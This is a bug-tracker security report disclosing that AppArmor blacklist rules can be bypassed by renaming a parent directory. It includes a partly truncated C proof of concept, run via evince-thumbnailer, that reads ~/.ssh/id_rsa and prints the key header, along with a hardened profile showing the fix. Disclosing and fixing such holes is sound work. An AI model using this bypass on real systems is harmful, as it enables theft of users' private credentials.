filesystem blacklisting can be bypassed by moving parents
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| AppArmor | Confirmed | Undecided | Unassigned | |
Bug Description
I'm not sure whether this counts as just a hardening bug or a security bug for you, so I'm marking it as a security bug for now; please make this bug public if you don't think it qualifies as a security bug.
Some AppArmor policies attempt to blacklist access to specific directories while broadly granting write access to everything else. For example, the Firefox profile uses the user-files abstraction, which broadly permits write access to owned files under /home while using the private-files abstraction to block access to some files like ~/.bashrc. The same goes for the evince thumbnailer.
This is broken because if an attacker has write access to ~/.ssh/, but access to ~/.ssh/** is blocked, it is possible to rename ~/.ssh to ~/.ssh_, access ~/.ssh_/id_rsa, and rename ~/.ssh_ back to ~/.ssh.
Demo with evince:

```
user@ubuntu-
#define _GNU_SOURCE
#include <stdlib.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <err.h>
__attribute_
    printf(
    errno = 0;
    int fd = open("/
    printf("open id_rsa direct: %d, error = %m\n", fd);
    if (rename(
        err(1, "rename");
    errno = 0;
    fd = open("/
    printf("open id_rsa indirect: %d, error = %m\n", fd);
    if (rename(
        err(1, "rename2");
    char buf[1001];
    errno = 0;
    int res = read(fd, buf, 1000);
    printf("read res: %d, error = %m\n", res);
    if (res > 0) {
        buf[res] = 0;
        puts(buf);
    }
    exit(0);
}
user@ubuntu-
constructor running from evince-thumbnailer
open id_rsa direct: -1, error = Permission denied
open id_rsa indirect: 3, error = Success
read res: 1000, error = Success
-----BEGIN RSA PRIVATE KEY-----
[...]
user@ubuntu-
```
This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.
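The weak pattern the report describes, next to a hardened form, as an added illustration that is not from the report or from the AppArmor project's own abstractions. It assumes AppArmor's usual path-matching conventions: a directory matches with a trailing slash, `**` does not match the directory entry itself, and a rename needs write permission on both the old and the new path.

```apparmor
# Added illustration (not from the bug report or the AppArmor project).
# Assumes the standard tunables so that @{HOME} expands to the user's home.
#include <tunables/global>

# Weak form: the whole home directory is writable and only the contents
# of ~/.ssh are blacklisted.  Renaming ~/.ssh to ~/.ssh_ needs write
# permission on the directory entries "@{HOME}/.ssh/" and "@{HOME}/.ssh_/",
# and the broad rule grants both, so the blacklist is sidestepped:
# ~/.ssh_/id_rsa is not covered by "@{HOME}/.ssh/**".
profile demo-weak /usr/bin/demo-weak {
  #include <abstractions/base>
  owner @{HOME}/** rw,
  audit deny @{HOME}/.ssh/** mrwkl,
}

# Hardened form: deny the directory entry as well.  "{,**}" matches
# "@{HOME}/.ssh/" itself and everything below it, so the rename of the
# parent is refused and the files cannot be reached under another name.
profile demo-hardened /usr/bin/demo-hardened {
  #include <abstractions/base>
  owner @{HOME}/** rw,
  audit deny @{HOME}/.ssh/{,**} mrwkl,
}
```

The `audit` keyword makes each refused rename or open show up in the kernel log, which is the signal a defender would watch for here.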
Changed in apparmor: status: New → Confirmed
yep, this should be well known.